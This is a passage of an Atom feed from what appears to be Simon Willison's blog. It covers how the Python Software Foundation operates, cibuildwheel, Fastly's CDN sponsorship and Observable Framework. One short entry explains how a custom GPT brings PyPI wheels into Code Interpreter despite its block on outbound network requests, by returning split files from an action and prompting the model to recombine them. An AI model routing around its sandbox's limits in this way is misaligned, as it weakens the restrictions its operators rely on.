&lt;p&gt;One of the most consequential projects directly managed by the PSF is &lt;a href="https://pypi.org/"&gt;PyPI&lt;/a&gt;, the Python Package Index. This is the system that enables &lt;code&gt;pip install name-of-package&lt;/code&gt; to do its thing.&lt;/p&gt;
&lt;p&gt;Having PyPI managed by a non-profit that answers directly to the community it serves is a very good thing.&lt;/p&gt;
&lt;p&gt;PyPI's numbers are staggering. Today there are 570,000 projects consisting of 12,035,133 files, serving 1.9 billion downloads a day (that number from &lt;a href="https://pypistats.org/packages/__all__"&gt;PyPI Stats&lt;/a&gt;). Bandwidth for these downloads is donated by &lt;a href="https://www.fastly.com/"&gt;Fastly&lt;/a&gt;, a PSF Visionary Sponsor who recently signed &lt;a href="https://fosstodon.org/@ThePSF/112456715341751673"&gt;a five year agreement&lt;/a&gt; to continue this service.&lt;/p&gt;
&lt;p&gt;(This was a big deal - prior to that agreement there was concern over what would happen if Fastly ever decided to end that sponsorship.)&lt;/p&gt;
&lt;h4 id="pycon-is-a-key-commitment"&gt;PyCon is a key commitment&lt;/h4&gt;
&lt;p&gt;The annual US Python Conference - &lt;a href="https://us.pycon.org/"&gt;PyCon US&lt;/a&gt; - is a big part of the PSF's annual activities and operations. With over 3,000 attendees each year (and a $1.8m budget for 2023) running that conference represents a full-time job for several PSF staff members.&lt;/p&gt;
&lt;p&gt;In the past PyCon US has also been responsible for the majority of the PSF's operating income. This is no longer true today - in fact it ran at a slight loss this year. This is not a big problem: the PSF's funding has diversified, and the importance of PyCon US to the Python community is such that the PSF is happy to lose money running the event if necessary.&lt;/p&gt;
&lt;h4 id="other-psf-activities"&gt;Other PSF activities&lt;/h4&gt;
&lt;p&gt;Many of these are detailed in &lt;a href="https://www.python.org/psf/mission/"&gt;the full mission statement&lt;/a&gt;.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Operating &lt;a href="https://www.python.org/"&gt;python.org&lt;/a&gt; and making Python available to download. It's interesting to note that Python is distributed through many alternative routes that are not managed by the PSF - through Linux packaging systems like Ubuntu, Debian and Red Hat, via tools like Docker or Homebrew, by companies such as &lt;a href="https://www.anaconda.com/download"&gt;Anaconda&lt;/a&gt; or through newer channels such as &lt;a href="https://docs.astral.sh/uv/guides/install-python/"&gt;uv&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Owning and protecting the Python trademarks and the Python intellectual property rights under the (&lt;a href="https://opensource.org/license/python-2-0"&gt;OSI compliant&lt;/a&gt;) Python license. This is one of the fundamental reasons for the organization to exist, but thankfully is one of the smaller commitments in terms of cost and staff time.&lt;/li&gt;
&lt;li&gt;Running the annual PyCon US conference.&lt;/li&gt;
&lt;li&gt;Operating the Python Packaging Index. Fastly provide the CDN, but the PSF still takes on the task of developing and operating the core PyPI web application and the large amounts of moderation and user support that entails.&lt;/li&gt;
&lt;li&gt;Supporting infrastructure used for core Python development, and logistics for core Python sprints.&lt;/li&gt;
&lt;li&gt;Issuing grants to Python community efforts.&lt;/li&gt;
&lt;li&gt;Caring for fiscal sponsorees.&lt;/li&gt;
&lt;li&gt;Supporting the work of PSF Work Groups.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="work-groups"&gt;Work Groups&lt;/h4&gt;
&lt;p&gt;A number of PSF initiatives take place in the form of Work Groups, &lt;a href="https://www.python.org/psf/workgroups/"&gt;listed here&lt;/a&gt;. Work Groups are teams of volunteers from the community who collaborate on projects relevant to the PSF's mission.&lt;/p&gt;
&lt;p&gt;Each Work Group sets its own cadence and ways of working. Some groups have decisions delegated to them by the board - for example the Grants Work Group for reviewing grant proposals and the Code of Conduct Work Group for enforcing Code of Conduct activity. Others coordinate technical projects such as the &lt;a href="https://wiki.python.org/psf/InfrastructureWG"&gt;Infrastructure Working Group&lt;/a&gt;, who manage and make decisions on various pieces of technical infrastructure relevant to Python and the PSF.&lt;/p&gt;
&lt;p&gt;Work Groups are formed by a board vote, with a designated charter. Most recently the board approved &lt;a href="https://github.com/psf/user-success-wg/blob/main/WG-charter.md"&gt;a charter&lt;/a&gt; for a new User Success Work Group, focusing on things like improving the new Python user onboarding experience.&lt;/p&gt;
&lt;h4 id="acting-as-a-fiscal-sponsor"&gt;Acting as a fiscal sponsor&lt;/h4&gt;
&lt;p&gt;This is another term I was unfamiliar with before joining the board: the idea of a &lt;strong&gt;fiscal sponsor&lt;/strong&gt;, which is a key role played by the PSF.&lt;/p&gt;
&lt;p&gt;Running a non-profit organization is decidedly non-trivial: you need a legal structure, a bank account, accounting, governance, the ability to handle audits - there's a whole lot of complexity behind the scenes.&lt;/p&gt;
&lt;p&gt;Looking to run an annual community conference? You'll need a bank account, and an entity that can sign agreements with venues and vendors.&lt;/p&gt;
&lt;p&gt;Want to accept donations to support work you are doing? Again, you need an entity, and a bank account, and some form of legal structure that ensures your donors can confidently trust you with their money.&lt;/p&gt;
&lt;p&gt;Instead of forming a whole new non-profit for this, you can instead find an existing non-profit that is willing to be your "fiscal sponsor". They'll handle the accounting and various other legal aspects, which allows you to invest your efforts in the distinctive work that you are trying to do.&lt;/p&gt;
&lt;p&gt;The PSF acts as a fiscal sponsor for a number of different organizations - 20 as of the 2023 report - including PyLadies, Twisted, Pallets, Jazzband, PyCascades and North Bay Python. The PSF's accounting team invest a great deal of effort in making all of this work.&lt;/p&gt;
&lt;p&gt;The PSF generally takes a 10% cut of donations to its fiscal sponsorees. This doesn't actually cover the full staffing cost of servicing these organizations, but this all still makes financial sense in terms of the PSF's mission to support the global Python community.&lt;/p&gt;
&lt;h4 id="life-as-a-board-member"&gt;Life as a board member&lt;/h4&gt;
&lt;p&gt;There are 12 board members. Elections are held every year after PyCon US, voted on by the PSF membership - by both paid members and members who have earned voting rights through being acknowledged as PSF fellows.&lt;/p&gt;
&lt;p&gt;Board members are elected for three-year terms. Since 1-3 new board members are likely to join annually, these terms ensure there is overlap, which helps maintain institutional knowledge about how the board operates.&lt;/p&gt;
&lt;p&gt;The board's activities are governed by &lt;a href="https://www.python.org/psf/bylaws/"&gt;the PSF Bylaws&lt;/a&gt;, and there is a documented process for modifying them (see ARTICLE XI).&lt;/p&gt;
&lt;p&gt;We have board members from all over the world. This is extremely important, because the PSF is responsible for the health and growth of the global Python community. A perennial concern is how to ensure that board candidates are nominated from around the world, in order to maintain that critical global focus.&lt;/p&gt;
&lt;p&gt;The board meets once a month over Zoom, has ongoing conversations via Slack and meets in-person twice a year: once at PyCon US and once at a "retreat" in a different global city, selected to try and minimize the total amount of travel needed to get all of our global board members together in the same place.&lt;/p&gt;
&lt;p&gt;Our most recent retreat was in Lisbon, Portugal. The retreat before that was in Malmö in Sweden.&lt;/p&gt;
&lt;p&gt;I considered using an analogy that describes each board member as 1/12th of the "brain" of the PSF, but that doesn't hold up: the paid, full-time staff of the PSF make an enormous number of decisions that impact how the PSF works.&lt;/p&gt;
&lt;p&gt;Instead, the board acts to set strategy, represent the global community and help ensure that the PSF's activities are staying true to that mission. Like I said earlier, the mission definition really is &lt;em&gt;critical&lt;/em&gt;. I admit that in the past I've been a bit cynical about the importance of mission statements: being a board member of a 501(c)(3) non-profit has entirely cured me of that skepticism!&lt;/p&gt;
&lt;p&gt;Board members can also sit on board committees, of which there are currently four: the Executive Committee, Finance Committee, PyCon US Committee and Membership Committee. These mainly exist so that relevant decisions can be delegated to them, helping reduce the topics that must be considered by the full board in our monthly meetings.&lt;/p&gt;
&lt;h4 id="the-kinds-of-things-the-board-talks-about"&gt;The kinds of things the board talks about&lt;/h4&gt;
&lt;p&gt;Our Lisbon retreat involved two full 9-hour days of discussion, plus social breakfasts, lunches and dinners. It was an &lt;em&gt;intense&lt;/em&gt; workload.&lt;/p&gt;
&lt;p&gt;I won't even attempt to do it justice here, but I'll use a couple of topics to illustrate the kind of things we think about on the board.&lt;/p&gt;
&lt;p&gt;The first is our &lt;strong&gt;grants strategy&lt;/strong&gt;. The PSF financially sponsors Python community events around the world. In the past this grants program has suffered from low visibility and, to simplify, we've felt that we weren't giving away enough money.&lt;/p&gt;
&lt;p&gt;Over the past year we've fixed that: board outreach around the grants program and initiatives such as grants office hours have put our grants program in a much healthier position... but potentially &lt;em&gt;too&lt;/em&gt; healthy.&lt;/p&gt;
&lt;p&gt;We took steps to improve that visibility and streamline that process, and they worked! This gives us a new problem: we now have no shortage of applicants, so we need to figure out how to stick within a budget that won't harm the financial sustainability of the PSF itself.&lt;/p&gt;
&lt;p&gt;Does this mean we say no to more events? Should we instead reduce the size of our grants? Can we take other initiatives, like more actively helping events find alternative forms of sponsorship?&lt;/p&gt;
&lt;p&gt;Grants shouldn't just be about events - but if we're making grants to other initiatives that support the Python community how can we fairly select those, manage the budget allocated to supporting them and maximize the value the Python community gets from the money managed by the PSF?&lt;/p&gt;
&lt;p&gt;A much larger topic for the retreat was &lt;strong&gt;strategic planning&lt;/strong&gt;. What should our goals be for the PSF that can't be achieved over a short period of time? Projects and initiatives that might require a one-year, three-year or five-year planning horizon.&lt;/p&gt;
&lt;p&gt;Director terms only last three years (though board members can and frequently do stand for re-election), so having these long-term goals planned and documented in detail is crucial.&lt;/p&gt;
&lt;p&gt;A five-year plan is not something that can be put together over two days of work, but the in-person meeting is a fantastic opportunity to kick things off and ensure each board member gets to participate in shaping that process.&lt;/p&gt;
&lt;h4 id="want-to-know-more-"&gt;Want to know more?&lt;/h4&gt;
&lt;p&gt;The above is by no means a comprehensive manual to the PSF, but it's a good representation of the things I would have found most valuable to understand when I first got involved with the organization.&lt;/p&gt;
&lt;p&gt;For a broader set of perspectives on how the board works and what it does, I recommend the &lt;a href="https://www.youtube.com/watch?v=kD6cPBfR4A4"&gt;FAQs about the PSF Board&lt;/a&gt; video on YouTube.&lt;/p&gt;
&lt;p&gt;If you're interested in helping the PSF achieve its mission, we would love to have you involved:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Encourage your company to sponsor the PSF directly, or to sponsor Python events worldwide&lt;/li&gt;
&lt;li&gt;Volunteer at PyCon US or help with other suitable PSF initiatives&lt;/li&gt;
&lt;li&gt;Join a Work Group that's addressing problems you want to help solve&lt;/li&gt;
&lt;li&gt;Run your own event and &lt;a href="https://www.python.org/psf/grants/"&gt;apply for a grant&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Join the PSF as a voting member and vote in our elections&lt;/li&gt;
&lt;li&gt;Run for the board elections yourself!&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We're always interested in hearing from our community. We host public office hours on the PSF Discord every month, at different times of day to cater for people in different timezones - here's &lt;a href="https://pyfound.blogspot.com/2024/08/ask-questions-or-tell-us-what-you-think.html"&gt;the full calendar of upcoming office hours&lt;/a&gt;.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/psf"&gt;psf&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="pypi"/><category term="python"/><category term="psf"/></entry><entry><title>cibuildwheel 2.20.0 now builds Python 3.13 wheels by default</title><link href="https://simonwillison.net/2024/Aug/6/cibuildwheel/#atom-tag" rel="alternate"/><published>2024-08-06T22:54:44+00:00</published><updated>2024-08-06T22:54:44+00:00</updated><id>https://simonwillison.net/2024/Aug/6/cibuildwheel/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/pypa/cibuildwheel/releases/tag/v2.20.0"&gt;cibuildwheel 2.20.0 now builds Python 3.13 wheels by default&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;CPython 3.13 wheels are now built by default […] This release includes CPython 3.13.0rc1, which is guaranteed to be ABI compatible with the final release.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;a href="https://cibuildwheel.pypa.io/"&gt;cibuildwheel&lt;/a&gt; is an underrated but crucial piece of the overall Python ecosystem.&lt;/p&gt;
&lt;p&gt;Python wheel packages that include binary compiled components - packages with C extensions for example - need to be built multiple times, once for each combination of Python version, operating system and architecture.&lt;/p&gt;
&lt;p&gt;A package like Adam Johnson’s &lt;a href="https://github.com/adamchainz/time-machine"&gt;time-machine&lt;/a&gt; - which bundles a &lt;a href="https://github.com/adamchainz/time-machine/blob/main/src/_time_machine.c"&gt;500 line C extension&lt;/a&gt; - can end up with &lt;a href="https://pypi.org/project/time-machine/#files"&gt;55 different wheel files&lt;/a&gt; with names like &lt;code&gt;time_machine-2.15.0-cp313-cp313-win_arm64.whl&lt;/code&gt; and &lt;code&gt;time_machine-2.15.0-cp38-cp38-musllinux_1_2_x86_64.whl&lt;/code&gt;.&lt;/p&gt;
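&lt;p&gt;Those filename components follow the wheel spec (&lt;a href="https://peps.python.org/pep-0427/"&gt;PEP 427&lt;/a&gt;): &lt;code&gt;{name}-{version}-{python tag}-{abi tag}-{platform tag}.whl&lt;/code&gt;. As a rough sketch of how that encoding works (the &lt;code&gt;packaging&lt;/code&gt; library's &lt;code&gt;parse_wheel_filename&lt;/code&gt; is the proper tool for real code; this simplified function is mine), the compatibility tags can be pulled apart like so:&lt;/p&gt;

```python
def parse_wheel_filename(filename):
    """Split a wheel filename into its PEP 427 components:
    {name}-{version}(-{build})?-{python tag}-{abi tag}-{platform tag}.whl

    Works because wheel names normalize hyphens to underscores,
    so "-" only separates the fields themselves.
    """
    if not filename.endswith(".whl"):
        raise ValueError("not a wheel filename")
    parts = filename[: -len(".whl")].split("-")
    if len(parts) == 5:
        name, version, python_tag, abi_tag, platform_tag = parts
        build = None
    elif len(parts) == 6:
        name, version, build, python_tag, abi_tag, platform_tag = parts
    else:
        raise ValueError("unexpected wheel filename structure")
    return {
        "name": name, "version": version, "build": build,
        "python": python_tag, "abi": abi_tag, "platform": platform_tag,
    }

info = parse_wheel_filename("time_machine-2.15.0-cp313-cp313-win_arm64.whl")
print(info["python"], info["platform"])  # cp313 win_arm64
```

&lt;p&gt;Multiply the distinct Python tags by the distinct platform tags and you can see how a single release fans out into dozens of wheel files.&lt;/p&gt;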
&lt;p&gt;Without these wheels, anyone who runs &lt;code&gt;pip install time-machine&lt;/code&gt; will need to have a working C compiler toolchain on their machine for the command to work.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;cibuildwheel&lt;/code&gt; solves the problem of building all of those wheels for all of those different platforms on the CI provider of your choice. Adam is using it in GitHub Actions for &lt;code&gt;time-machine&lt;/code&gt;, and his &lt;a href="https://github.com/adamchainz/time-machine/blob/2.15.0/.github/workflows/build.yml"&gt;.github/workflows/build.yml&lt;/a&gt; file neatly demonstrates how concise the configuration can be once you figure out how to use it.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://www.python.org/downloads/release/python-3130rc1/"&gt;first release candidate of Python 3.13&lt;/a&gt; hit its target release date of August 1st, and the final version looks on schedule for release on the 1st of October. Since this rc should be binary compatible with the final build now is the time to start shipping those wheels to PyPI.

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://twitter.com/adamchainz/status/1820821199850476004"&gt;@adamchainz&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/continuous-integration"&gt;continuous-integration&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/packaging"&gt;packaging&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/adam-johnson"&gt;adam-johnson&lt;/a&gt;&lt;/p&gt;



</summary><category term="continuous-integration"/><category term="packaging"/><category term="pypi"/><category term="python"/><category term="adam-johnson"/></entry><entry><title>pip install GPT</title><link href="https://simonwillison.net/2024/Jul/21/pip-install-gpt/#atom-tag" rel="alternate"/><published>2024-07-21T05:54:24+00:00</published><updated>2024-07-21T05:54:24+00:00</updated><id>https://simonwillison.net/2024/Jul/21/pip-install-gpt/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://chatgpt.com/g/g-470NtUZER-pip-install"&gt;pip install GPT&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I've been uploading wheel files to ChatGPT in order to install them into Code Interpreter &lt;a href="https://til.simonwillison.net/llms/code-interpreter-expansions"&gt;for a while now&lt;/a&gt;. Nico Ritschel built a better way: this GPT can download wheels directly from PyPI and then install them.&lt;/p&gt;
&lt;p&gt;I didn't think this was possible, since Code Interpreter is blocked from making outbound network requests.&lt;/p&gt;
&lt;p&gt;Nico's trick uses a new-to-me feature of GPT Actions: you can &lt;a href="https://platform.openai.com/docs/actions/sending-files/returning-files"&gt;return up to ten files&lt;/a&gt; from an action call and ChatGPT will download those files to the same disk volume that Code Interpreter can access.&lt;/p&gt;
&lt;p&gt;Nico wired up a Val Town endpoint that can divide a PyPI wheel into multiple 9.5MB files (if necessary) to fit the file size limit for files returned to a GPT, then uses prompts to tell ChatGPT to combine the resulting files and treat them as installable wheels.&lt;/p&gt;
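&lt;p&gt;The split-and-recombine step itself is conceptually simple. Here's an illustrative sketch (the function names and exact chunking are my own approximation, not Nico's code; only the ~9.5MB limit comes from the post):&lt;/p&gt;

```python
CHUNK_SIZE = 9_500_000  # ~9.5MB, under the per-file limit for files returned to a GPT

def split_bytes(data, chunk_size=CHUNK_SIZE):
    """Divide a blob (e.g. the bytes of a .whl file) into ordered chunks."""
    return [data[i:i + chunk_size] for i in range(0, len(data), chunk_size)]

def join_chunks(chunks):
    """Reassemble the chunks back into the original blob."""
    return b"".join(chunks)

# Stand-in for a real wheel file's contents
wheel = b"x" * 20_000_000
parts = split_bytes(wheel)
print(len(parts))  # 3
assert join_chunks(parts) == wheel
```

&lt;p&gt;The server does the &lt;code&gt;split_bytes&lt;/code&gt; half; the &lt;code&gt;join_chunks&lt;/code&gt; half is what the prompts ask Code Interpreter to do before running &lt;code&gt;pip install&lt;/code&gt; on the reassembled file.&lt;/p&gt;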

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://twitter.com/nicoritschel/status/1814716092801294786"&gt;@nicoritschel&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/chatgpt"&gt;chatgpt&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/code-interpreter"&gt;code-interpreter&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/coding-agents"&gt;coding-agents&lt;/a&gt;&lt;/p&gt;



</summary><category term="pypi"/><category term="python"/><category term="ai"/><category term="generative-ai"/><category term="chatgpt"/><category term="llms"/><category term="code-interpreter"/><category term="coding-agents"/></entry><entry><title>PSF announces a new five year commitment from Fastly</title><link href="https://simonwillison.net/2024/May/17/pypi-fastly/#atom-tag" rel="alternate"/><published>2024-05-17T13:52:16+00:00</published><updated>2024-05-17T13:52:16+00:00</updated><id>https://simonwillison.net/2024/May/17/pypi-fastly/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://fosstodon.org/@ThePSF/112456715341751673"&gt;PSF announces a new five year commitment from Fastly&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Fastly have been donating CDN resources to Python—most notably to the PyPI package index—for ten years now.&lt;/p&gt;

&lt;p&gt;The PSF just announced at PyCon US that Fastly have agreed to a new five year commitment. This is a really big deal, because it addresses the strategic risk of having a key sponsor like this who might change their support policy based on unexpected future conditions.&lt;/p&gt;

&lt;p&gt;Thanks, Fastly. Very much appreciated!&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/psf"&gt;psf&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/fastly"&gt;fastly&lt;/a&gt;&lt;/p&gt;



</summary><category term="pypi"/><category term="python"/><category term="psf"/><category term="fastly"/></entry><entry><title>Interesting ideas in Observable Framework</title><link href="https://simonwillison.net/2024/Mar/3/interesting-ideas-in-observable-framework/#atom-tag" rel="alternate"/><published>2024-03-03T17:54:21+00:00</published><updated>2024-03-03T17:54:21+00:00</updated><id>https://simonwillison.net/2024/Mar/3/interesting-ideas-in-observable-framework/#atom-tag</id><summary type="html">
    &lt;p&gt;Mike Bostock, &lt;a href="https://observablehq.com/blog/observable-2-0"&gt;Announcing: Observable Framework&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Today we’re launching &lt;a href="https://observablehq.com/product"&gt;Observable 2.0&lt;/a&gt; with a bold new vision: an open-source static site generator for building fast, beautiful data apps, dashboards, and reports.&lt;/p&gt;
&lt;p&gt;Our mission is to help teams communicate more effectively with data. Effective presentation of data is critical for deep insight, nuanced understanding, and informed decisions. Observable notebooks are great for ephemeral, &lt;em&gt;ad hoc&lt;/em&gt; data exploration. But notebooks aren't well-suited for polished dashboards and apps.&lt;/p&gt;
&lt;p&gt;Enter &lt;a href="https://observablehq.com/framework/"&gt;Observable Framework&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;There are a lot of &lt;em&gt;really&lt;/em&gt; interesting ideas in Observable Framework.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2024/Mar/3/interesting-ideas-in-observable-framework/#static-site-dashboards"&gt;A static site generator for data projects and dashboards&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2024/Mar/3/interesting-ideas-in-observable-framework/#javascript-in-markdown"&gt;JavaScript in Markdown&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2024/Mar/3/interesting-ideas-in-observable-framework/#everything-reactive"&gt;Everything is still reactive&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2024/Mar/3/interesting-ideas-in-observable-framework/#only-code-you-use"&gt;Only include the code that you use&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2024/Mar/3/interesting-ideas-in-observable-framework/#cache-data-at-build"&gt;Cache your data at build time&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2024/Mar/3/interesting-ideas-in-observable-framework/#comparison-to-observable-notebooks"&gt;Comparison to Observable Notebooks&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2024/Mar/3/interesting-ideas-in-observable-framework/#change-in-strategy"&gt;A change in strategy&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h4 id="static-site-dashboards"&gt;A static site generator for data projects and dashboards&lt;/h4&gt;
&lt;p&gt;At its heart, Observable Framework is a static site generator. You give it a mixture of Markdown and JavaScript (and potentially other languages too) and it compiles them all together into fast loading interactive pages.&lt;/p&gt;
&lt;p&gt;It ships with a full featured hot-reloading server, so you can edit those files in your editor, hit save and see the changes reflected instantly in your browser.&lt;/p&gt;
&lt;p&gt;Once you're happy with your work you can run a build command to turn it into a set of static files ready to deploy to a server - or you can use the &lt;code&gt;npm run deploy&lt;/code&gt; command to deploy it directly to Observable's own authenticated sharing platform.&lt;/p&gt;
&lt;h4 id="javascript-in-markdown"&gt;JavaScript in Markdown&lt;/h4&gt;
&lt;p&gt;The key to the design of Observable Framework is the way it uses JavaScript in Markdown to create interactive documents.&lt;/p&gt;
&lt;p&gt;Here's what that looks like:&lt;/p&gt;
&lt;div class="highlight highlight-text-md"&gt;&lt;pre&gt;&lt;span class="pl-mh"&gt;# &lt;span class="pl-en"&gt;This is a document&lt;/span&gt;&lt;/span&gt;

Markdown content goes here.

This will output 1870:

&lt;span class="pl-s"&gt;```&lt;/span&gt;&lt;span class="pl-en"&gt;js&lt;/span&gt;
&lt;span class="pl-c1"&gt;34&lt;/span&gt; &lt;span class="pl-k"&gt;*&lt;/span&gt; &lt;span class="pl-c1"&gt;55&lt;/span&gt;
&lt;span class="pl-s"&gt;```&lt;/span&gt;

And here's the current date and time, updating constantly:

&lt;span class="pl-s"&gt;```&lt;/span&gt;&lt;span class="pl-en"&gt;js&lt;/span&gt;
&lt;span class="pl-k"&gt;new&lt;/span&gt; &lt;span class="pl-en"&gt;Date&lt;/span&gt;(now)
&lt;span class="pl-s"&gt;```&lt;/span&gt;

The same thing as an inline string: ${new Date(now)}&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Any Markdown code block tagged &lt;code&gt;js&lt;/code&gt; will be executed as JavaScript in the user's browser. This is an &lt;em&gt;incredibly&lt;/em&gt; powerful abstraction - anything you can do in JavaScript (which these days is effectively anything at all) can now be seamlessly integrated into your document.&lt;/p&gt;
&lt;p&gt;In the above example the &lt;code&gt;now&lt;/code&gt; value is interesting - it's a special variable that provides the current time in milliseconds since the epoch, updating constantly. Because &lt;code&gt;now&lt;/code&gt; updates constantly, the display value of the cell and that inline expression will update constantly as well.&lt;/p&gt;
&lt;p&gt;If you've used Observable Notebooks before this will feel familiar - but notebooks involve code and markdown authored in separate cells. With Framework they are all now part of a single text document.&lt;/p&gt;
&lt;p&gt;Aside: when I tried the above example I found that the &lt;code&gt;${new Date(now)}&lt;/code&gt; inline expression displayed as &lt;code&gt;Mon Feb 19 2024 20:46:02 GMT-0800 (Pacific Standard Time)&lt;/code&gt; while the &lt;code&gt;js&lt;/code&gt; block displayed as &lt;code&gt;2024-02-20T04:46:02.641Z&lt;/code&gt;. That's because inline expressions use the JavaScript default string representation of the object, while the &lt;code&gt;js&lt;/code&gt; block uses the Observable &lt;code&gt;display()&lt;/code&gt; function, which has its own rules for how to display different types of objects, &lt;a href="https://github.com/observablehq/inspector/blob/main/src/inspect.js"&gt;visible in inspector/src/inspect.js&lt;/a&gt;.&lt;/p&gt;
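&lt;p&gt;You can reproduce both representations in plain Node.js, independent of Framework (a quick sketch - only the default string varies with your local timezone):&lt;/p&gt;

```javascript
// The same Date object rendered two ways: inline ${...} expressions use the
// JavaScript default string conversion, while display() shows Date objects
// in ISO 8601 form.
const d = new Date(Date.UTC(2024, 1, 20, 4, 46, 2, 641));

// Timezone-dependent, e.g. "Mon Feb 19 2024 20:46:02 GMT-0800 (...)" in Pacific time
const inlineStyle = String(d);

// Always the same regardless of timezone
const displayStyle = d.toISOString(); // "2024-02-20T04:46:02.641Z"

console.log(inlineStyle);
console.log(displayStyle);
```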
&lt;h4 id="everything-reactive"&gt;Everything is still reactive&lt;/h4&gt;
&lt;p&gt;The best feature of Observable Notebooks is their &lt;em&gt;reactivity&lt;/em&gt; - the way cells automatically refresh when other cells they depend on change. This is a big difference to Python's popular Jupyter notebooks, and is the signature feature of &lt;a href="https://marimo.io/"&gt;marimo&lt;/a&gt;, a new Python notebook tool.&lt;/p&gt;
&lt;p&gt;Observable Framework retains this feature in its new JavaScript Markdown documents.&lt;/p&gt;
&lt;p&gt;This is particularly useful when working with form inputs. You can drop an input onto a page and refer to its value throughout the rest of the document, adding realtime interactivity incredibly easily.&lt;/p&gt;
&lt;p&gt;Here's an example. I ported one of my &lt;a href="https://observablehq.com/@simonw/datasette-downloads-per-day-with-observable-plot"&gt;favourite notebooks&lt;/a&gt; to Framework, which provides a tool for viewing download statistics for my various Python packages.&lt;/p&gt;
&lt;p&gt;The Observable Framework version can be found at &lt;a href="https://simonw.github.io/observable-framework-experiments/package-downloads"&gt;https://simonw.github.io/observable-framework-experiments/package-downloads&lt;/a&gt; - source code &lt;a href="https://github.com/simonw/observable-framework-experiments/blob/main/docs/package-downloads.md?plain=1"&gt;here on GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2024/pypi-dashboard.gif" alt="Animated demo showing PyPI download stats for Datasette projects - as I switch a select menu between sqlite-utils and csv-diff and shot-scraper the displayed chart updates to match." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;This entire thing is just 57 lines of Markdown. Here's the code with additional comments (and presented in a slightly different order - the order of code blocks doesn't matter in Observable thanks to reactivity).&lt;/p&gt;
&lt;div class="highlight highlight-text-md"&gt;&lt;pre&gt;&lt;span class="pl-mh"&gt;# &lt;span class="pl-en"&gt;PyPI download stats for Datasette projects&lt;/span&gt;&lt;/span&gt;

Showing downloads for &lt;span class="pl-s"&gt;**&lt;/span&gt;${packageName}&lt;span class="pl-s"&gt;**&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It starts with a Markdown &lt;code&gt;&amp;lt;h1&amp;gt;&lt;/code&gt; heading and text that shows the name of the selected package.&lt;/p&gt;
&lt;div class="highlight highlight-text-md"&gt;&lt;pre&gt;&lt;span class="pl-s"&gt;```&lt;/span&gt;&lt;span class="pl-en"&gt;js&lt;/span&gt; echo
&lt;span class="pl-k"&gt;const&lt;/span&gt; &lt;span class="pl-c1"&gt;packageName&lt;/span&gt; &lt;span class="pl-k"&gt;=&lt;/span&gt; &lt;span class="pl-en"&gt;view&lt;/span&gt;(&lt;span class="pl-smi"&gt;Inputs&lt;/span&gt;.&lt;span class="pl-c1"&gt;select&lt;/span&gt;(packages, {
